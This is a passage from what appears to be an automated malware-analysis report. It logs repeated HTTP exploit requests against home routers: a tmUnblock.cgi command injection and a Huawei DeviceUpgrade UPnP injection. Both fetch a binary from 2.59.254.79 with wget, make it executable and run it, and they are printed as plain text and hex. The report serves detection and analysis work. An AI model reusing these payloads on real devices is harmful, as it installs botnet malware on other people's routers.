xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
